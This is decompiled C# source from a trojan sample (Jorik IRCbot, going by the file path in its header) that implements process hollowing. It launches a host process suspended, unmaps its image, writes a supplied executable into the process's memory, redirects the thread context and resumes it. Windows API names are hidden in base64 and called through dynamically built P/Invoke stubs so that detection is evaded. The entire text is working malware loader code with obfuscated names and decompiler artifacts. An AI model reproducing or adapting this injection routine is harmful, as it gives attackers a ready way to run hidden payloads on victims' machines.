// Decompiled with JetBrains decompiler // Type: uqeyrwlquci0gyeo0qjxqcszc // Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null // MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe using System; using System.Reflection; using System.Reflection.Emit; using System.Runtime.InteropServices; public static class uqeyrwlquci0gyeo0qjxqcszc { private const uint CONTEXT_FULL = 65543; private const int CREATE_SUSPENDED = 4; private const int MEM_COMMIT = 4096; private const int MEM_RESERVE = 8192; private const int PAGE_EXECUTE_READWRITE = 64; private const ushort IMAGE_DOS_SIGNATURE = 23117; private const uint IMAGE_NT_SIGNATURE = 17744; public static unsafe bool Vbm2knor525p1x3t5q2zsdbhh( byte[] exeBuffer, string hostProcess, string optionalArguments) { byte[] dst1 = new byte[40]; byte[] dst2 = new byte[248]; byte[] dst3 = new byte[64]; int[] numArray1 = new int[4]; byte[] numArray2 = new byte[716]; fixed (byte* numPtr = &dst1[0]) ; fixed (byte* numPtr = &dst2[0]) ; fixed (byte* numPtr = &dst3[0]) ; fixed (byte* numPtr = &numArray2[0]) ; // ISSUE: fixed variable is out of scope *(int*) numPtr = 65543; Buffer.BlockCopy((Array) exeBuffer, 0, (Array) dst3, 0, dst3.Length); // ISSUE: fixed variable is out of scope if (*(ushort*) numPtr != (ushort) 23117) return false; // ISSUE: fixed variable is out of scope int srcOffset = *(int*) (numPtr + 60); Buffer.BlockCopy((Array) exeBuffer, srcOffset, (Array) dst2, 0, dst2.Length); // ISSUE: fixed variable is out of scope if (*(uint*) numPtr != 17744U) return false; string str = ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r(""); if (!string.IsNullOrEmpty(optionalArguments)) str = hostProcess + " " + optionalArguments; if (!uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("Q3JlYXRlUHJvY2Vzcw=="), new Type[10] { typeof (string), typeof (string), typeof (IntPtr), typeof (IntPtr), typeof (bool), typeof (int), typeof (IntPtr), typeof (string), typeof (byte[]), typeof (int[]) }, (object) hostProcess, (object) str, (object) IntPtr.Zero, (object) IntPtr.Zero, (object) false, (object) 4, (object) IntPtr.Zero, null, (object) new byte[68], (object) numArray1)) return false; // ISSUE: fixed variable is out of scope IntPtr num1 = new IntPtr(*(int*) (numPtr + 52)); int num2 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRVbm1hcFZpZXdPZlNlY3Rpb24="), new Type[2] { typeof (IntPtr), typeof (IntPtr) }, (object) (IntPtr) numArray1[0], (object) num1); // ISSUE: fixed variable is out of scope if (uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("VmlydHVhbEFsbG9jRXg="), new Type[5] { typeof (IntPtr), typeof (IntPtr), typeof (uint), typeof (int), typeof (int) }, (object) (IntPtr) numArray1[0], (object) num1, (object) *(uint*) (numPtr + 80), (object) 12288, (object) 64) == IntPtr.Zero) uqeyrwlquci0gyeo0qjxqcszc.Vbm2knor525p1x3t5q2zsdbhh(exeBuffer, hostProcess, optionalArguments); fixed (byte* numPtr = &exeBuffer[0]) { // ISSUE: fixed variable is out of scope uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5] { typeof (IntPtr), typeof (IntPtr), typeof (IntPtr), typeof (uint), typeof (IntPtr) }, (object) (IntPtr) numArray1[0], (object) num1, (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 84), (object) IntPtr.Zero); } // ISSUE: fixed variable is out of scope for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index) { Buffer.BlockCopy((Array) exeBuffer, srcOffset + dst2.Length + dst1.Length * (int) index, (Array) dst1, 0, dst1.Length); // ISSUE: fixed variable is out of scope fixed (byte* numPtr = &exeBuffer[(IntPtr) *(uint*) (numPtr + 20)]) { // ISSUE: fixed variable is out of scope // ISSUE: fixed variable is out of scope uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5] { typeof (IntPtr), typeof (IntPtr), typeof (IntPtr), typeof (uint), typeof (IntPtr) }, (object) (IntPtr) numArray1[0], (object) (IntPtr) ((long) (int) num1 + (long) *(uint*) (numPtr + 12)), (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 16), (object) IntPtr.Zero); } } // ISSUE: fixed variable is out of scope uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRHZXRDb250ZXh0VGhyZWFk"), new Type[2] { typeof (IntPtr), typeof (IntPtr) }, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr); // ISSUE: fixed variable is out of scope uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5] { typeof (IntPtr), typeof (IntPtr), typeof (IntPtr), typeof (int), typeof (IntPtr) }, (object) (IntPtr) numArray1[0], (object) (IntPtr) (long) *(uint*) (numPtr + 172), (object) num1, (object) 4, (object) IntPtr.Zero); // ISSUE: fixed variable is out of scope // ISSUE: fixed variable is out of scope *(int*) (numPtr + 176) = (int) num1 + (int) *(uint*) (numPtr + 40); // ISSUE: fixed variable is out of scope int num3 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRTZXRDb250ZXh0VGhyZWFk"), new Type[2] { typeof (IntPtr), typeof (IntPtr) }, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr); int num4 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRSZXN1bWVUaHJlYWQ="), new Type[2] { typeof (IntPtr), typeof (IntPtr) }, (object) (IntPtr) numArray1[1], (object) IntPtr.Zero); return true; } public static TR Ym0011n1sqree12pbi2kviopbv04c0hwt( string name, string method, Type[] typeArr, params object[] arguments) { ModuleBuilder moduleBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("temp"), AssemblyBuilderAccess.Run).DefineDynamicModule(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bW9kdWxl")); moduleBuilder.DefinePInvokeMethod(method, name, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, typeof (TR), typeArr, CallingConvention.Winapi, CharSet.Ansi).SetImplementationFlags(MethodImplAttributes.PreserveSig); moduleBuilder.CreateGlobalFunctions(); return (TR) moduleBuilder.GetMethod(method).Invoke((object) null, arguments); } }